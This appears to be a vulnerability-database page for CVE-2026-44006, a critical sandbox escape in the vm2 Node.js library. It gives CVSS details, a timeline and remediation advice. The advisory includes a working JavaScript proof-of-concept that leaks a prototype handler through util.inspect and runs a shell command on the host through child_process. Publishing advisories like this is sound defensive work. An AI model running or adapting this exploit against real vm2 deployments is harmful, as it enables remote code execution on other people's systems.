What is the CVSS score of CVE-2026-44006?

CVE-2026-44006 has a CVSS 3.1 base score of 10.0 (Critical). CVSS vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H. EPSS exploitation probability: 0.0%.

Which versions of vm2 are affected by CVE-2026-44006?

CVE-2026-44006 is a critical remote code execution vulnerability in the vm2 Node.js sandbox library that allows complete bypass of sandbox isolation through prototype chain manipulation, enabling…. A patch is available.

vm2 CVE-2026-44006

CRITICAL

Code Injection (CWE-94)

2026-05-07 https://github.com/patriksimek/vm2

GHSA-qcp4-v2jj-fjx8

RCE Code Injection

10.0

CVSS 3.1

CVSS VectorNVD

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H

Attack Vector

Network

Attack Complexity

Low

Privileges Required

None

User Interaction

None

Scope

Changed

Confidentiality

High

Integrity

High

Availability

High

Lifecycle Timeline

Source Code Evidence Fetched

May 07, 2026 - 04:15 vuln.today

Analysis Generated

May 07, 2026 - 04:15 vuln.today

CVE Published

May 07, 2026 - 03:54 nvd

CRITICAL 10.0

DescriptionNVD

Summary

It is possible to reach BaseHandler.getPrototypeOf, which can be used to get arbitrary prototypes

Details

https://github.com/patriksimek/vm2/blob/408fc855f1cc1bbc2985b029465ee0e732ada433/lib/bridge.js#L655-L658

BaseHandler can be reached via util.inspect (same as https://github.com/patriksimek/vm2/commit/57971fa423abeb66f09e47e18102986549474ca8)

PoC

let obj = {
	subarray: Buffer.prototype.inspect,
	slice: Buffer.prototype.slice,
	hexSlice: () => '',
};

let sym;

obj.slice(10, {
	showHidden: true,
	showProxy: true,
	depth: 10,
	stylize(a) {
		const handler = this.seen && this.seen[1];

		if (handler && handler.getPrototypeOf) {
			gP = handler.getPrototypeOf;
			HObjectProto = gP(gP(gP(gP(Buffer))));
			HObject = HObjectProto.constructor;
			sym = HObject.getOwnPropertySymbols(Buffer.prototype).at(0);
		}
		return a;
	},
});

obj = {
	[sym]: (depth, opt, inspect) => {
		inspect.constructor('return process')()
		.getBuiltinModule('child_process')
		.execSync('id', { stdio: 'inherit' });
	},
	valueOf: undefined,
	constructor: undefined,
};

WebAssembly.compileStreaming(obj).catch(() => {});

Impact

Sandbox Escape -> RCE

AnalysisAI

Prototype chain manipulation in vm2 Node.js sandbox library enables complete sandbox escape and remote code execution via util.inspect handler leakage. Attackers can exploit BaseHandler.getPrototypeOf through crafted objects to access host process primitives and execute arbitrary system commands. …

RemediationAI

Within 24 hours: Identify all systems running vm2 using dependency scanning tools (npm audit, Snyk, or similar) and document versions in use. Within 7 days: Upgrade vm2 to version 3.11.0 or later across all development, staging, and production environments; verify upgrade completion with version confirmation commands. …

Analysis

Detailed AI-generated intelligence summary covering attack vector, impact assessment, affected versions, remediation steps, and indicators of compromise.

POChttps://••••••••••.com/exploit

PATCHhttps://••••••••••.com/patch

ADVISORYhttps://••••••••••.com/advisory

Full analysis requires sign-in

Get intelligence summaries, risk assessment, exploit details, threat intel, and remediation guidance.

CVE-2026-44006 vulnerability details – vuln.today

Back

vm2 CVE-2026-44006

CVSS VectorNVD

Lifecycle Timeline

DescriptionNVD

Summary

Details

PoC

Impact

AnalysisAI

RemediationAI

Full analysis requires sign-in

Share

External POC / Exploit Code